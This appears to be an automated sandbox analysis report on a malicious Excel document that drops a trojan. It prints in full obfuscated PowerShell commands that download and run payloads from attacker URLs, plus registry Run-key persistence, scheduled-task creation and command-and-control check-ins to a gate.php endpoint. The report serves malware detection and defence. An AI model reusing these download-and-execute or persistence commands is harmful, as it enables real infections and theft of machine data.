Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q#"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: qA"SOFTWARE\VMware, Inc.\VMware Tools
Source: ps.exe, 00000018.00000002.2158723567.00000000026C6000.00000004.00000001.sdmp	Binary or memory string: q87HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools\.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_004F1750 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

27_2_004F1750

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 27_2_00401179 SetUnhandledExceptionFilter,

27_2_00401179

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\svchost.exe

Network Connect: 172.67.167.122 80

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Memory written: C:\Users\user\AppData\Local\Temp\ps.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Users\user\AppData\Roaming\svchost.exe base: 400000 value starts with: 4D5A

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/njaLDrp','pd.bat')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe 'C:\Users\user\AppData\Local\Temp\ps.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmpEDF8.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Local\Temp\ps.exe C:\Users\user\AppData\Local\Temp\ps.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe 'C:\Users\user\AppData\Roaming\svchost.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\GvthaHtVzpRh' /XML 'C:\Users\user\AppData\Local\Temp\tmp121B.tmp'
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process created: unknown unknown

Language, Device and Operating System Detection:

Yara detected Obfuscated Powershell

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\Documents\pd.bat, type: DROPPED

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Code function: 24_2_00AD079A GetUserNameA,

24_2_00AD079A

Source: C:\Users\user\AppData\Local\Temp\ps.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

Jump to behavior

Stealing of Sensitive Information:

Searches for user specific document files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.8.238	unknown	United States	13335	CLOUDFLARENETUS	true
172.67.167.122	unknown	United States	13335	CLOUDFLARENETUS	true
37.46.150.139	unknown	Moldova Republic of	8758	IWAYCH	false

Contacted Domains

Name	IP	Active
cutt.ly	172.67.8.238	true
cryptodual.net	172.67.167.122	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://cryptodual.net/cc/gate.php	true	Avira URL Cloud: safe	unknown
http://cryptodual.net/cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command	true	Avira URL Cloud: safe	unknown
http://37.46.150.139/bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat	false	Avira URL Cloud: safe	unknown

AV Detection:

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\GvthaHtVzpRh.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Joe Sandbox ML: detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	24_2_00B35D70
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	24_2_00B35D60
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 2Ch	27_2_0043204F
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00460436
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00474483
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00468684
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00460816
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push esi	27_2_004688D4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_00462A48
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00491728h	27_2_00468D03
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov edx, dword ptr [ecx+08h]	27_2_00428FFC
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi	27_2_00455030
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_00455030
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0045D0F4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00467148
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 1Ch	27_2_004231D0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00467278
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00491AB0h	27_2_0046D2A2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi	27_2_00455390
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_00455390
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then sub esp, 1Ch	27_2_00423493
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0046157C
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0047D657
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451650
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_004616DB
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_004737E7
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00492088h	27_2_0046B7B4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	27_2_00427830
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 00492108h	27_2_0046B8B4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov eax, dword ptr [0048E55Ch]	27_2_004558B2
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00477930
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebx	27_2_004739A7
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451BD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451BD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00451BD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00467BB4
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00431C2F
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push edi	27_2_00471CD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0044DD5D
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00427DD0
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push esi	27_2_00467E04
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_0044DE0B
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then push ebp	27_2_00431E3F
Source: C:\Users\user\AppData\Local\Temp\ps.exe	Code function: 4x nop then mov dword ptr [ecx], 004921A0h	27_2_00477EB2
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	32_2_02015598
Source: C:\Users\user\AppData\Roaming\svchost.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	39_2_00804FD0

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: cutt.ly

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49171 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.22:49172 -> 172.67.167.122:80
Source: Traffic	Snort IDS: 2026071 ET TROJAN W32.FakeEzQ.kr Checkin 192.168.2.22:49172 -> 172.67.167.122:80

Found C&C like URL pattern

Source: global traffic	HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
Source: global traffic	HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 172.67.8.238 172.67.8.238
Source: Joe Sandbox View	IP Address: 37.46.150.139 37.46.150.139

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknown	TCP traffic detected without corresponding DNS query: 37.46.150.139

Source: global traffic	HTTP traffic detected: GET /bat/scriptxls_27c96e3c-9015-4716-8c85-64582d96aaaf_zilla07_wdexclusion.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
